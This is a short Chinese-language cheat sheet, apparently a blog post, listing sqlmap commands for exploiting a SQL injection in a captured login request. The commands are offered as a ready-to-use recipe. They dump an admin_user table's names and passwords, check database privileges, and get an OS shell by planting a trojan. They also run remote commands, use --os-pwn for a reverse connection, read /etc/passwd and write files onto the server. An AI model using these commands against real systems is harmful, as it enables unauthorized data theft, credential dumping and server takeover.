Sqlmap 常用命令

 

今天远哥整理了一下Sqlmap工具最常用的一些命令。

 

首先使用 BurpSuite 或其他抓包工具拿到 Payload。

Payload.txt 举例： 

POST /Api/Login HTTP/1.1
Host: api.xxxx.com:8080
Content-Length: 167
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://api.xxxx.com
Referer: http://api.xxxx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION=af4085ec-e398-48cc-ba68-3e312a6c1ea4
Connection: close

{"requestcommand":"Login","debug":true,"userName":"test","password":"123456","lang":"cn"}

假设 userName 参数存在注入点，以下是常用的命令举例：

//sql注入，查看数据库数量和名字

sqlmap -r "/local/Payload.txt" -p userName --dbs

//查看指定数据库下所有的表
sqlmap -r "/local/Payload.txt" -p userName --tables -D "CmsDb"

//查看指定表的所有列
sqlmap -r "/local/Payload.txt" -p userName --columns -T "admin_user" -D "CmsDb"

//查看指定表的数据记录
sqlmap -r "/local/Payload.txt" -p userName --dump -T "admin_user" -D "CmsDb" -C "name,password"

//查看当前数据库用户的权限
sqlmap -r "/local/Payload.txt" -p userName --privileg

//拿到shell，需要在服务器上生成MuMa文件
sqlmap -r "/local/Payload.txt" -p userName --os-shell

//直接在服务器上执行命令
sqlmap -r "/local/Payload.txt" -p userName --os-cmd=ipconfig

//拿到 sql shell
sqlmap -r "/local/Payload.txt" -p userName --sql-shell

sql-shell> select version();

select version();:    '5.7.34'

//反弹
sqlmap -r "/local/Payload.txt" -p userName --os-pwn

//查看服务器上的文件
sqlmap -r "/local/Payload.txt" -p userName --file-read=/etc/passwd

sqlmap -r "/local/Payload.txt" -p userName --file-read "/etc/passwd"


//将本地文件上传到服务器
sqlmap -r "/local/Payload.txt" -p userName --file-write /local/test.txt --file-dest /home/www/test.txt


sqlmap -r "/local/Payload.txt" -p userName --file-write /root/hello.txt --file-dest /root/hello.txt

 

 

​